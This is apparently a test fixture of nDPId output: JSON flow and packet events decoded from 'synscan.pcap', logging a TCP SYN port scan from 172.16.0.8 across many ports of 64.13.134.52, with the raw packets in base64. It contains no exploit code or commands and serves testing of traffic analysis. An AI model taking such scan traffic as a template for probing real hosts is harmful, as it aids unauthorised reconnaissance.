+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsjm8AADsGfwOsEAAIQA2GNIzTBCzdU4MZAAAAAGACEAAkYAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsNcIAADsG17CsEAAIQA2GNIzTAcrdU4MZAAAAAGACEAAmwgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsQD4AAC8G2TSsEAAIQA2GNIzTCjDdU4MZAAAAAGACEAAeXAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsRiMAACwG1k+sEAAIQA2GNIzTF0DdU4MZAAAAAGACBAAdTAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsnG0AADEGewWsEAAIQA2GNIzTCVrdU4MZAAAAAGACCAAnMgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsx\/4AACcGWXSsEAAIQA2GNIzTD6TdU4MZAAAAAGACEAAY6AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsd04AADEGoCSsEAAIQA2GNIzTAavdU4MZAAAAAGACCAAu4QAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsVHoAADUGvvisEAAIQA2GNIzTrZrdU4MZAAAAAGACCACC8QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsHa8AADMG98OsEAAIQA2GNIzTE9\/dU4MZAAAAAGACEAAUrQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs7BgAAC8GLVqsEAAIQA2GNIzTCIPdU4MZAAAAAGACEAAgCQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsqeUAADIGbI2sEAAIQA2GNIzSAFHdUoMYAAAAAGACDAAsPgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsFL0AADgG+7WsEAAIQA2GNIzSDJXdUoMYAAAAAGACBAAn+gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsrY4AADkGYeSsEAAIQA2GNIzSCf3dUoMYAAAAAGACCAAmkgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsa9wAADQGqJasEAAIQA2GNIzSACXdUoMYAAAAAGACBAA0agAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs78gAACwGLKqsEAAIQA2GNIzSCFfdUoMYAAAAAGACBAAsOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsv00AACwGXSWsEAAIQA2GNIzSCvndUoMYAAAAAGACBAAplgAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs9QwAADoGGWasEAAIQA2GNIzSx5\/dUoMYAAAAAGACDABk7wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsyZkAAC0GUdmsEAAIQA2GNIzSDx\/dUoMYAAAAAGACCAAhcAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsVS8AADkGukOsEAAIQA2GNIzSAA3dUoMYAAAAAGACCAAwggAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsv\/MAADkGT3+sEAAIQA2GNIzSFqndUoMYAAAAAGACCAAZ5gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsI4UAADEG8+2sEAAIQA2GNIzSDPrdUoMYAAAAAGACCAAjlQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060558,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_packet_id":1,"flow_last_seen":1278275060558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060558,"pkt":"ACYLMQczACWzv5HuCABFAAAsrqQAADcGYs6sEAAIQA2GNIzSB+XdUoMYAAAAAGACEAAgqgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060559,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_packet_id":1,"flow_last_seen":1278275060559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060559,"pkt":"ACYLMQczACWzv5HuCABFAAAsFrkAADkG+LmsEAAIQA2GNIzSDQXdUoMYAAAAAGACCAAjigAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAswpEAADIGU+GsEAAIQA2GNIzTB87dU4MZAAAAAGACDAAkvgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsLeIAAC8G65CsEAAIQA2GNIzTAaDdU4MZAAAAAGACEAAm7AAAAgQFtA=="} 
